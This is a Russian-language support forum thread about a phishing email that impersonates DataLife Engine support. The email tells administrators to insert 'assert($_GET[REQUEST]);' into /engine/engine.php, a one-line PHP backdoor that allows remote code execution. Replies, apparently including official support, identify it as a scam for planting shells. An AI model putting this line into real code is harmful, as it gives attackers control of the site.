Перейти к публикации

Рассылка писем от имени DataLife Engine


Рекомендованные сообщения

Здравствуйте.

Пришло вот это -

Благодарим Вас за использование на Вашем сайте нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);

С уважением,Служба поддержки «DataLife Engine»

IP адрес отправителя: 46.38.63.68

И правда рассылка или развод =) ?

Спасибо.

Ссылка на сообщение
Поделиться на других сайтах

Это развод, уже десятки тем на форуме. Все баг-фиксы нужно смотреть на странице http://dle-news.ru/bags/ или нажав на главной странице админ-панели на кнопку "Проверить наличие обновлений".

Ссылка на сообщение
Поделиться на других сайтах

Это мошенники. Это письмо пришло не от нас и не от нашего домена. А просто было отправлено вам с вашего же сайта через обратную связь.

Все патчи публикуются только на странице http://dle-news.ru/bags/ и ставить нужно патчи только с официального сайта. А это распространение шеллов для того чтобы ваш сайт можно было взломать.

Тех. поддержке нет необходимости ходить по обратным связям ваших сайтов, мы обладаем E-mail клиентов, т.к. вы регистрировались на нашем сайте. И в случае выхода обновлений, вы это увидите в своей админпанели, есть для этого специальная кнопка, также официально публикуем патч на сайте, и отправляем уведомления клиентом напрямую с нашего сайта и домена, а не через обратную связь ваших сайтов.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...